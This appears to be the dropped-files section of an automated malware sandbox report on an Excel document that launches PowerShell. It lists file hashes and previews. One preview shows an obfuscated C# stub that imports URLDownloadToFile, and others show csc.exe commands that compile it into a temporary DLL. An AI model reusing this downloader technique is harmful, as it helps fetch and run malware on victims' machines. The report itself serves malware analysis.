                                                                                                                    Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1452584
                                                                                                                    Entropy (8bit):0.2562765619857971
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:Yal/OGHWWmn/Ml/+f3n/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXn+W1f:YeOkQsoXb
                                                                                                                    MD5:467157C2656371305C0BE8EC47FDE4A2
                                                                                                                    SHA1:5BC781040C3F1BEC75F46D6626B7625BD82D194F
                                                                                                                    SHA-256:3959559289FDB01337D3762E3729ED49E765B3C0968F361097F39018E5F7F79B
                                                                                                                    SHA-512:BC10E03F7E0598FB8D37CAAC99AB1FC348D491A8C7633DA78D79DEA0A6FE64121C0B895B5168D00558B4EC16286C61FDE32378D4E83FACC59D63CF5F91F13F29
                                                                                                                    Malicious:false
                                                                                                                    Preview:....l...........b................;..kH.. EMF....(*..............................@................................................................;..kH..........c.......Q...l)..........b.......................c.......P...(...x....(...... ....;..kH..(...c................(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):44256
                                                                                                                    Entropy (8bit):3.147465798679962
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
                                                                                                                    MD5:36D8FF25D14E7E2FBB1968E952FF9C17
                                                                                                                    SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
                                                                                                                    SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
                                                                                                                    SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
                                                                                                                    Malicious:false
                                                                                                                    Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:U:U
                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                    Malicious:false
                                                                                                                    Preview:1
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:U:U
                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                    Malicious:false
                                                                                                                    Preview:1
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:U:U
                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                    Malicious:false
                                                                                                                    Preview:1
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Dec 11 09:54:25 2024, 1st section name ".debug$S"
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1328
                                                                                                                    Entropy (8bit):3.982202661488926
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:Hue9E2U+cc0XdH6QwKdNWI+ycuZhNnakSJPNnqSqd:GM0tCKd41ulna3rqSK
                                                                                                                    MD5:0A5DD785520C7745CC0F47D6540D76FF
                                                                                                                    SHA1:45EABF79FF8E7EA2E39EB0F1B84D1A80B7F3F5E3
                                                                                                                    SHA-256:F15DB123365CC7D9444ABBF223116F6FA10E2C79D96AB4EB944D5C26C5027E39
                                                                                                                    SHA-512:9ADD44D90B28EA5E9213EB8B1C8B27C6ACC52375C4C7389A12B03F23E72201442A02A8D700C681BB038CD3F1BD99E38E31CD7C86356F0C61CEABFC44CF478785
                                                                                                                    Malicious:false
                                                                                                                    Preview:L...QaYg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\otto1awr\CSCDFB69145189A40B197F122BC8548BE9C.TMP...................k^N..D"..)............4.......C:\Users\user\AppData\Local\Temp\RES254C.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.t.t.o.1.a.w.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Dec 11 09:54:04 2024, 1st section name ".debug$S"
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1328
                                                                                                                    Entropy (8bit):3.977033237258471
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:HBe9EAdsltUBdHqwKdNWI+ycuZhNZakSHPNnqSqd:SGXUnhKd41ulZa3VqSK
                                                                                                                    MD5:2D7A312D45D0C0FFA7EDC192A31E205E
                                                                                                                    SHA1:C185732C29FC43E5BC3814FA429FD618790B5A01
                                                                                                                    SHA-256:73335C7A9D9075E084214FABC01529FE384E5DCA2C960BDE73A095A416A273E3
                                                                                                                    SHA-512:5EDDEE5C8C1545A30CC0C6A5F5C634B05BBEC697B2A9FDE11529F9105EF956A30F35C7AA4A12D3CEB24E3E731FEEB982396EC5EB985F2CF85E468BEF231AF13F
                                                                                                                    Malicious:false
                                                                                                                    Preview:L...<aYg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........Q....c:\Users\user\AppData\Local\Temp\oojbmfem\CSCF5327E7FE341DA9559637718172BC.TMP..................9=..<EGe..K...j...........4.......C:\Users\user\AppData\Local\Temp\RESD3B4.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.o.j.b.m.f.e.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:U:U
                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                    Malicious:false
                                                                                                                    Preview:1
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:U:U
                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                    Malicious:false
                                                                                                                    Preview:1
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:U:U
                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                    Malicious:false
                                                                                                                    Preview:1
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:U:U
                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                    Malicious:false
                                                                                                                    Preview:1
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                    File Type:MSVC .res
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):652
                                                                                                                    Entropy (8bit):3.0851267584967617
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryX7ak7Ynqqc0PN5Dlq5J:+RI+ycuZhNZakSHPNnqX
                                                                                                                    MD5:393DFB033C454765F9E04BCDE5F96A82
                                                                                                                    SHA1:32490FD24A31F34DA669B083757875BD22365EAB
                                                                                                                    SHA-256:CF347B657231B0F7533590E5C57B93ED354384373863AED3473E3811D6979FCA
                                                                                                                    SHA-512:3F7059768444CA57EE1C353AF5972796E2B1B9675A3DED91C6B2ED5A263854ED53742A23808E7E4F18060417E2D1211346C06D424B1A28A81AC4183C25CA705E
                                                                                                                    Malicious:false
                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.o.j.b.m.f.e.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.o.j.b.m.f.e.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (381)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):496
                                                                                                                    Entropy (8bit):3.8625189088917398
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:V/DsYLDS81zueDloKemMGNJjQXReKJ8SRHy4HHmIrxr5GJwv5FQy:V/DTLDfuvbXfHFtzBKy
                                                                                                                    MD5:EE707A34980A4DF56A07BE04F7825B38
                                                                                                                    SHA1:65CE7B9161C445F33F2F28DC13C92872C209E83A
                                                                                                                    SHA-256:FE3DC6C711DDB4C32C5FF8B18B557804D3180005BFA99A8DC02B945D70EA5CBC
                                                                                                                    SHA-512:1FB569AC9EACA82C89CB3ED59BFFE339FE579A62668ED4899D234AB64A4B08EAD39C088DB17D3745EB16B7F3428B6ED7EB664ED13F90B21D00759158A40F9CD5
                                                                                                                    Malicious:false
                                                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace uLqhyfAK.{. public class XoE. {. [DllImport("urlMOn.dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr OshWemv,string UekySpGpmJ,string CbdSzBOp,uint lZfiKkQnaJr,IntPtr XTfcjf);.. }..}.
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):369
                                                                                                                    Entropy (8bit):5.185273322420924
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fVpGzxs7+AEszIP23fVphx:p37Lvkmb6KzdpGWZEodphx
                                                                                                                    MD5:67F74B8CFC5DCF4431FF59627F0A404C
                                                                                                                    SHA1:215D92795A5C57AD8A2042791311014BB3DB878D
                                                                                                                    SHA-256:9CC5A50E1B2AC2283141E43BA0D5917C1920D67FCD99342919CB99AA714FF3A1
                                                                                                                    SHA-512:18477D86CAE1ED353CC3EF42CDBB1553AC88C03BD1972DE702F2C9851A6D5FA345F0DFC6679455B948E112A57B9063C69D58F45B748806316AB5B2FB099EA577
                                                                                                                    Malicious:true
                                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.0.cs"
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):3072
                                                                                                                    Entropy (8bit):2.8629514105957723
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:etGSPWp2YYnl8cjLOkfxbkNkHtkZf31uWCq4lWI+ycuZhNZakSHPNnq:6lY8+wpQk2JFu7qF1ulZa3Vq
                                                                                                                    MD5:E636A475772A15ACF607D0EA72EC9176
                                                                                                                    SHA1:D16E6BAF5C4BE9843CB55C773E6616C94A92599B
                                                                                                                    SHA-256:31CBD50F96DACD66E61F476578CD1466A0FB62593671A0B977ED836E3A50B20B
                                                                                                                    SHA-512:E982BE750074C75B02CF8ACB72628801A6FAF55323BD6E1B61B924A130DF43EC2213B95981CC305F34F807D05F2B071F15D55F9AD5B561CEBFCD250ADC946A41
                                                                                                                    Malicious:false
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...;aYg...........!.................#... ...@....... ....................................@.................................h#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......(...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................4.-...................................................... ;.....P ......M.........S.....[.....f.....o.....{...M.....M...!.M.....M.......!.....*.......;.......................................$..........<Module>.oo
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):866
                                                                                                                    Entropy (8bit):5.3186004581782935
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:AId3ka6Kzd9EodsKaMD5DqBVKVrdFAMBJTH:Akka60zEoOKdDcVKdBJj
                                                                                                                    MD5:D53D57BB008CA57CA30EB160EDD66148
                                                                                                                    SHA1:18DEC8855E2EABF6C13896AD02DE1294B1F1DD71
                                                                                                                    SHA-256:05245EF19E7996D25AEE67DC3B7EC4E2AA04404083DC63C580BDFC66EAD65261
                                                                                                                    SHA-512:84445C77A96C09579A95294A895FE0D00DC53B59E6BA1FE8B28F9BDD9333715FB4E942CF1F12FD6DFD19B306875A4ED2EC56C814F56F8709D2BF9BD3D94CCC70
                                                                                                                    Malicious:false
                                                                                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                    File Type:MSVC .res
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):652
                                                                                                                    Entropy (8bit):3.0829992625139235
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry+etak7YnqqdeiPN5Dlq5J:+RI+ycuZhNnakSJPNnqX
                                                                                                                    MD5:81B0838D6B5E4EC10E4422AEE42904A5
                                                                                                                    SHA1:E814B26E9D7F68F6F0FE17EC5A53A5A52BF3DECE
                                                                                                                    SHA-256:B62AA16E3BB2BC0387FFE69F5FF5F9D1C7CA97CA6CD8E42C9ED47DB8E8E35B3F
                                                                                                                    SHA-512:5F3F13738D7E41DE7D047D9FB026A6BBF48CCB9A97C653864ECAC136100C792B371885D67C03CB4B04229A55FD4C7CAFA289C9CBA5BA7F7F3FB77155F57FDEEB
                                                                                                                    Malicious:false
                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.t.t.o.1.a.w.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.t.t.o.1.a.w.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (381)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):496
                                                                                                                    Entropy (8bit):3.8625189088917398
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:V/DsYLDS81zueDloKemMGNJjQXReKJ8SRHy4HHmIrxr5GJwv5FQy:V/DTLDfuvbXfHFtzBKy
                                                                                                                    MD5:EE707A34980A4DF56A07BE04F7825B38
                                                                                                                    SHA1:65CE7B9161C445F33F2F28DC13C92872C209E83A
                                                                                                                    SHA-256:FE3DC6C711DDB4C32C5FF8B18B557804D3180005BFA99A8DC02B945D70EA5CBC
                                                                                                                    SHA-512:1FB569AC9EACA82C89CB3ED59BFFE339FE579A62668ED4899D234AB64A4B08EAD39C088DB17D3745EB16B7F3428B6ED7EB664ED13F90B21D00759158A40F9CD5
                                                                                                                    Malicious:false
                                                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace uLqhyfAK.{. public class XoE. {. [DllImport("urlMOn.dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr OshWemv,string UekySpGpmJ,string CbdSzBOp,uint lZfiKkQnaJr,IntPtr XTfcjf);.. }..}.
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):369
                                                                                                                    Entropy (8bit):5.162893665409342
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fGDUFUzxs7+AEszIP23fGDU/n:p37Lvkmb6Kz+vWZEo+q
                                                                                                                    MD5:97A088E6C6F4E2FB3F99D6C2281AA52F
                                                                                                                    SHA1:B8FACE3777794177C5B5EC3C964C989D8F015278
                                                                                                                    SHA-256:77378DCFDCD8458F1595C7377FAFB54B0F25AD0963FDA2D3383FCF170FA17787
                                                                                                                    SHA-512:52F2D6EFBD41D73EA11D4C006A9FFF4AF1B87C4C5E5BC06F77722EE1268EA0CC98D6000F201E770B691830199C1C1D5382BC16097D3CD8ACF465CF211E272F89
                                                                                                                    Malicious:false
                                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.0.cs"
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):3072
                                                                                                                    Entropy (8bit):2.8581223591934815
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:etGSY1Wp2YYnl8cjLOkfxbkrkHtkZfn6jq4lWI+ycuZhNnakSJPNnq:6YTY8+wpSk2Jn6jqF1ulna3rq
                                                                                                                    MD5:91C9DBB9F6FF910A064401B8BFFDC1D6
                                                                                                                    SHA1:F24A5CC32643B24CFEADE685CD055FE5262A7CF3
                                                                                                                    SHA-256:15DFA903F48D4ED39117EB50C7A7AE0DA4FF0C576DD9D37699C17ACD093A81E8
                                                                                                                    SHA-512:FB817D264EFC2E29EFCAB7C1B2372BA55AFB8E18EC92F46CA20847A66FA4D8EC58F6853DFEECEAD2B349072F392ABC0CACE7755EDF5317F326D3A9C57CC21D00
                                                                                                                    Malicious:false
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...PaYg...........!.................#... ...@....... ....................................@.................................h#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......(...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................4.-...................................................... ;.....P ......M.........S.....[.....f.....o.....{...M.....M...!.M.....M.......!.....*.......;.......................................$..........<Module>.ot
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):866
                                                                                                                    Entropy (8bit):5.296769616413598
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:AId3ka6Kz+sEo+jKaMD5DqBVKVrdFAMBJTH:Akka60bEoGKdDcVKdBJj
                                                                                                                    MD5:6531C96180D30971B707D7833DADD668
                                                                                                                    SHA1:B4483333EBDB789B69AA7749D47C7C889BEAB5F9
                                                                                                                    SHA-256:89A2C5E717D0C908749B3FFD8650AF0263726A545E152A2DA51352ABD59A9F65
                                                                                                                    SHA-512:7713D36FDB33C43C6D0523D675D35C46BC165ADDB1A79145BEA408DC11713129919CEBC132FC2E68C5FC6999DD01872549F6703765F0B90F751FE465A330CC88
                                                                                                                    Malicious:false
                                                                                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:U:U
                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
